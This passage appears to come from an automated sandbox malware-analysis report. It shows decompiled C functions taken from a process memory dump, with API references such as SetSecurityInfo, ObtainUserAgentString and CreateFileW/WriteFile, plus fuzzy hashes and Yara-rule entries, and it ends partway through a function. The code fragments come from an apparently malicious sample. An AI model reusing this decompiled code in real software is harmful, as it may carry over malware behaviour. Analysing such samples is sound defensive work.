0x000cbca1
0x000cbca5
0x000cbca8
0x000cbca9
0x000cbcab
0x000cbcac
0x000cbcb9
0x000cbcbe
0x000cbcc2
0x000cbcc6
0x000cbcc7
0x000cbccc
0x000cbcd7
0x000cbcd9
0x000cbcdc
0x000cbce1
0x000cbce2
0x000cbce3
0x000cbce4
0x000cbce6
0x000cbce8
0x000cbcf1
0x000cbcf3
0x000cbcf3
0x000cbcf1
0x000cbcf4
0x000cbcfd
0x000cbcfd
0x000cbd04
0x000cbd0f

APIs

SetSecurityInfo.ADVAPI32(000001E0,00000006,00000010,00000000,00000000,00000000,?,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCE9

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: InfoSecurity
String ID:
API String ID: 3528565900-0
Opcode ID: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
Instruction ID: a8e78ae5fe899e9e6dcb65718c11a878b9f3e22039a9cadb435a55c152528d81
Opcode Fuzzy Hash: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
Instruction Fuzzy Hash: 25112871A01119ABDB10EF95DC89EEEBBBCEF04740F1040AAB905E7191DB749A01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000CE450, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E000CE450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0xde6b0; // 0x26307f8
				if( *_t5 == 0) {
					_v8 = E000C95C7(0x2a7);
					 *0xde788 = E000C91A6(_t6, 0);
					E000C85C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E000C8604(0x101);
					 *0xde788 = _t10;
					_t11 =  *0xde6b0; // 0x26307f8
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E000C861A(0xde788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x000ce453
0x000ce454
0x000ce45c
0x000ce4a6
0x000ce4b3
0x000ce4b8
0x00000000
0x000ce45e
0x000ce463
0x000ce46a
0x000ce473
0x000ce47a
0x000ce481
0x000ce485
0x000ce4bd
0x000ce4c0
0x000ce487
0x000ce499
0x000ce499
0x000ce485

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,000CE4F7), ref: 000CE481

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
Instruction ID: 8079f1387fde3651cf51c068454c49593d8a393480f3ea93dffd8e4335a106f5
Opcode Fuzzy Hash: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
Instruction Fuzzy Hash: 7DF06230609240EBF788EBB4DC4AF9D77E4AB15364F24425DE415DB2D2EFB499409628

Uniqueness

Uniqueness Score: -1.00%

Function 000CA65C, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x000ca65c
0x000ca65f
0x000ca660
0x000ca663
0x000ca665
0x000ca668
0x000ca66d
0x000ca69e
0x000ca6a0
0x000ca66f
0x000ca66f
0x000ca66f
0x000ca691
0x00000000
0x00000000
0x000ca693
0x000ca696
0x000ca69c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000ca69c
0x000ca6a5
0x000ca6a5
0x000ca6a1
0x000ca6a4

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1

Uniqueness

Uniqueness Score: -1.00%

Function 000CA5F7, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x000ca601
0x000ca615
0x000ca61a
0x000ca623
0x000ca625
0x000ca62f
0x000ca62f
0x00000000
0x000ca635
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271

Uniqueness

Uniqueness Score: -1.00%

Function 000CA63B, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000CA63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x000ca64f
0x000ca652
0x000ca657
0x000ca65b

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720

Uniqueness

Uniqueness Score: -1.00%

Function 000C8604, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C8604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
				return _t2;
			}

0x000c8612
0x000c8619

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0

Uniqueness

Uniqueness Score: -1.00%

Function 000CB269, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CB269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x000cb27c

APIs

GetFileAttributesW.KERNELBASE(00000000,000C4E7B), ref: 000CB26F

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
Instruction ID: e31c5f2542f69ce23b2b76098601bb74ace79624de71742bfcf3cc401eb3d774
Opcode Fuzzy Hash: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
Instruction Fuzzy Hash: E5B092B62210404BCA186B38998484D32909B1C2313220759B033CA0E1D624C8509A10

Uniqueness

Uniqueness Score: -1.00%

Function 000C85EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C85EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xde768 = _t1;
				return _t1;
			}

0x000c85f8
0x000c85fe
0x000c8603

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34

Uniqueness

Uniqueness Score: -1.00%

Function 000CF9BF, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000CF9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0xde654; // 0x27bfd30
				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4)));
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0xde654; // 0x27bfd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000C86E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E000C109A(_t63, 0x34a);
						_t66 =  *0xde688; // 0xf0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0xde688; // 0xf0000
						_push(_t67);
						_v20 = E000C92E5(_t39 + 0x1020);
						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000C85D5( &_v24);
						E000C85D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0xde654; // 0x27bfd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E000C861A( &_v16, _t69);
						E000C861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0xde654; // 0x27bfd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0xde688; // 0xf0000
						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0xde654; // 0x27bfd30
							continue;
						}
						break;
					}
					E000C861A( &_v12, 0);
				}
				return 0;
			}

0x000cf9c5
0x000cf9cd
0x000cf9d2
0x000cf9d8
0x000cf9de
0x000cf9f1
0x000cf9fb
0x000cfa05
0x000cfa08
0x000cfa0d
0x000cfa23
0x000cfa27
0x000cfa2c
0x000cfa2d
0x000cfa2e
0x000cfa33
0x000cfa36
0x000cfa37
0x000cfa38
0x000cfa3d
0x000cfa4c
0x000cfa51
0x000cfa56
0x000cfa5d
0x000cfa66
0x000cfa6b
0x000cfa6e
0x000cfa71
0x000cfa76
0x000cfa7c
0x000cfa81
0x000cfa86
0x000cfa89
0x000cfa9c
0x000cfaa1
0x000cfaa4
0x000cfaa4
0x000cfaac
0x000cfab7
0x000cfabc
0x000cfabf
0x000cfac2
0x000cfac2
0x000cfac8
0x000cfaca
0x000cface
0x000cfad9
0x000cfade
0x000cfae3
0x00000000
0x00000000
0x000cfaec
0x000cfaf2
0x000cfaf9
0x000cfafb
0x000cfafe
0x00000000
0x000cfafe
0x00000000
0x000cfaf9
0x000cfb0b
0x000cfb14
0x000cfb18

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
Opcode Fuzzy Hash: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 000C896F, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000C896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E000C8604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E000C8604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000C87EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E000C861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0xde684; // 0x27bf8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E000C861A(_t73, 0);
						}
						E000C861A( &_v20, 0);
						goto L1;
					}
					_t43 = E000CA6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E000C8815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E000C861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x000c8975
0x000c897c
0x000c897e
0x000c8986
0x000c8988
0x000c8990
0x000c8992
0x000c8995
0x000c8998
0x000c89ac
0x000c89b3
0x000c89b9
0x000c89c2
0x000c8a1a
0x000c8a1f
0x000c8a28
0x000c8a75
0x000c8a78
0x000c8a80
0x000c8a84
0x000c8a84
0x000c8a89
0x00000000
0x000c8a89
0x000c8a2a
0x000c8a2c
0x000c8a34
0x000c8a3a
0x000c8a3b
0x000c8a3b
0x000c8a43
0x000c8a46
0x000c8a4b
0x000c8a4b
0x000c8a4e
0x000c8a57
0x000c8a5c
0x000c8a62
0x000c8a69
0x00000000
0x000c8a6f
0x000c89cb
0x000c89d0
0x000c89d2
0x000c89d9
0x00000000
0x00000000
0x000c89ee
0x00000000
0x000c89f0
0x000c89f0
0x000c89fb
0x000c89fe
0x000c8a0b
0x00000000
0x000c8a11
0x000c89ee
0x000c899a
0x00000000

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000C89B9

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
Instruction ID: f7af5643379fb798a10d9983aff7c2aee7eeb5d10f7fdca91578ae01a6c37180
Opcode Fuzzy Hash: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
Instruction Fuzzy Hash: 96318172A04304EFEB249BA5D845F9EB7E9EF44760F64842EF50597182DF30AA00875D

Uniqueness

Uniqueness Score: -1.00%

Function 000CE2C6, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000CE2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0xde6b4; // 0x27bfa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0xde6b4; // 0x27bfa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0xde68c; // 0x27bfab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E000C8604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0xde68c; // 0x27bfab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E000C4905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x000ce2c6
0x000ce2d9
0x000ce2e0
0x000ce2e9
0x000ce2f1
0x000ce2f7
0x000ce2fc
0x000ce307
0x000ce30c
0x000ce3a5
0x000ce3a5
0x000ce3ad
0x00000000
0x000ce3b2
0x000ce313
0x000ce316
0x000ce31d
0x000ce32d
0x000ce333
0x000ce343
0x000ce348
0x000ce34d
0x000ce354
0x000ce358
0x000ce35f
0x000ce363
0x000ce367
0x000ce368
0x000ce36b
0x000ce370
0x000ce379
0x000ce385
0x000ce38f
0x000ce394
0x000ce394
0x000ce379
0x000ce39a
0x000ce39b
0x00000000
0x000ce3a4
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 000CE394

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
Instruction ID: d27438c55f7a9eb286fce9ed97ab300969749f514a42abca27bfc32afb8dea28
Opcode Fuzzy Hash: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
Instruction Fuzzy Hash: 1A310DB5900158AFDB11DF94CD88EEFBBBCEB08350F1142AAB911E7291D730AE018B61

Uniqueness

Uniqueness Score: -1.00%

Function 000CA3ED, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E000C9ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E000C9749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E000CA0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E000C9F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x000ca3ed
0x000ca3f6
0x000ca3f8
0x000ca3fa
0x000ca3fe
0x000ca400
0x000ca408
0x000ca40f
0x000ca418
0x000ca41d
0x000ca422
0x000ca446
0x000ca44b
0x000ca451
0x000ca45d
0x000ca462
0x000ca424
0x000ca42d
0x000ca443
0x00000000
0x000ca42f
0x000ca43b
0x000ca440
0x000ca42d
0x000ca422
0x000ca465
0x000ca466
0x000ca400
0x000ca470

APIs

Part of subcall function 000C9749: SetLastError.KERNEL32(0000000D,00000000,00000000,000CA341,00000000,00000000,?,?,?,000C5AE1), ref: 000C9782

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,000C4C60,?,?,00000000), ref: 000CA424

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
Instruction ID: d7e6118cc00964f766b737b52ca09863481d2aae4fe2f29f29cc8711e36414d7
Opcode Fuzzy Hash: b57cf1d61cdb095835d73ad5a8e6bc193129740f7953490e1dc8bc682e72e34b
Instruction Fuzzy Hash: 71116175B0010AABCB14DF59C489F9EF3AAFB85719F20816DD80197242DB70ED05CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000C5D7D, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E000C5D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0xde684; // 0x27bf8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0xde688; // 0xf0000
					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0xde6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E000C9EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0xde688; // 0xf0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x000c5d80
0x000c5d95
0x000c5d9e
0x000c5da7
0x000c5da9
0x000c5db1
0x000c5dc1
0x000c5dcf
0x000c5dd4
0x000c5dd9
0x000c5ddb
0x000c5ddd
0x000c5de2
0x000c5de4
0x000c5dff
0x000c5dff
0x000c5de6
0x000c5de7
0x000c5df2
0x000c5dfa
0x000c5dfc
0x000c5dfc
0x000c5de4
0x000c5e01
0x000c5db3
0x000c5db4
0x000c5db9
0x000c5dbe
0x000c5dbe
0x000c5e05

APIs

lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 000CBA05, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CBA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0xde68c; // 0x27bfab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E000CB998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0xde684; // 0x27bf8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

0x000cba0a
0x000cba12
0x000cba1a
0x000cba1f
0x000cba29
0x000cba32
